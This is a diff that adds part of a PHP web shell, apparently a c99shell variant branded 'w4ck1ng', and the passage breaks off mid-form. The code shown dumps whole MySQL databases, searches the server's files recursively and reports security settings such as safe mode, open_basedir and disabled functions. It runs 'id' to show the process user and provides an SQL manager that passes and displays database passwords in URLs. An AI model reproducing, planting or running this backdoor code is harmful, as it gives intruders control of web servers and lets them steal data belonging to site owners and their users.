+ if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+ if ((in_array($tab,$onlytabs)) or (!$c))
+ {
+ if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+ // recieve query for create table structure
+ $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+ if (!$res) {$ret["err"][] = mysql_smarterror();}
+ else
+ {
+ $row = mysql_fetch_row($res);
+ $out .= $row["1"].";\n\n";
+ // recieve table variables
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+ while ($row = mysql_fetch_assoc($res))
+ {
+ $keys = implode("`, `", array_keys($row));
+ $values = array_values($row);
+ foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+ $values = implode("', '", $values);
+ $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+ $out .= $sql;
+ }
+ }
+ }
+ }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+ $fp = fopen($file, "w");
+ if (!$fp) {$ret["err"][] = 2;}
+ else
+ {
+ fwrite ($fp, $out);
+ fclose ($fp);
+ }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+ $value = "";
+ if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+ $value .= "'".addslashes($v)."'";
+ if (!empty($functs[$k])) {$value .= ")";}
+ $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+ echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+ if ($tbl_struct)
+ {
+ echo "<td valign=\"top\"><b>Fields:</b><br>";
+ foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "?<a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+ echo "</td></tr></table>";
+ }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+ "METHOD"=>array(output_type),
+ "METHOD1"...
+ ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+ "SELECT"=>array(3,1),
+ "SHOW"=>array(2,1),
+ "DELETE"=>array(1),
+ "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+ $result["propertions"] = $types[$op];
+ $result["query"] = $query;
+ if ($types[$op] == 2)
+ {
+ foreach($arr as $k=>$v)
+ {
+ if (strtoupper($v) == "LIMIT")
+ {
+ $result["limit"] = $arr[$k+1];
+ $result["limit"] = explode(",",$result["limit"]);
+ if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+ unset($arr[$k],$arr[$k+1]);
+ }
+ }
+ }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+ if($f != "." && $f != "..")
+ {
+ $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+ if (is_dir($d.$f))
+ {
+ $search_i_d++;
+ if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+ if (!is_link($d.$f)) {c99fsearch($d.$f);}
+ }
+ else
+ {
+ $search_i_f++;
+ if ($bool)
+ {
+ if (!empty($a["text"]))
+ {
+ $r = @file_get_contents($d.$f);
+ if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+ if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+ if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+ else {$bool = strpos(" ".$r,$a["text"],1);}
+ if ($a["text_not"]) {$bool = !$bool;}
+ if ($bool) {$found[] = $d.$f; $found_f++;}
+ }
+ else {$found[] = $d.$f; $found_f++;}
+ }
+ }
+ }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+ $v = @ob_get_contents();
+ @ob_end_clean();
+ @ob_start("ob_gzHandler");
+ echo $v;
+ @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if 
(empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> + +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE> +TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; 
background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;} +.style1 { + color: #FF0000; + font-weight: bold; +} +.style2 {font-size: -3} +</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p> + <p><font size="-3"><span class="style2"></br> + 
<font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br> + + <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br> + + <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font 
color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br> + + <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br> + + <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br> + + <font color="#333333">ck1ngw4ck1ng</font><font 
color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br> + + <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br> + + <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font 
color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br> + + <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br> + + <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br> + + <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br> + <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br> + 
</span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version'); +echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } +echo "</b>"; +echo "<br/>MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = 
explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+ $t.= $r.DIRECTORY_SEPARATOR;
+ if ($j == $i) {break;}
+ $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+ $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+ if (!$bool) {$bool = is_dir($letter.":\\");}
+ if ($bool)
+ {
+ $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+ if ($letter.":" != $v) {$letters .= $letter;}
+ else {$letters .= "<font color=green>".$letter."</font>";}
+ $letters .= " ]</a> ";
+ }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+ $item[1] = str_replace("%d",urlencode($d),$item[1]);
+ $item[1] = str_replace("%sort",$sort,$item[1]);
+ $v = realpath($d."..");
+ if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+ $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+ echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+ $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+ $err = mysql_smarterror();
+ @mysql_select_db($sql_db,$sql_sock);
+ if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+ if (!$sql_server) {echo "NO CONNECTION";}
+ else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+ $sqlquicklaunch = array();
+ $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+ $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+ $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+ $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+ $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+ $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+ if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+ echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" 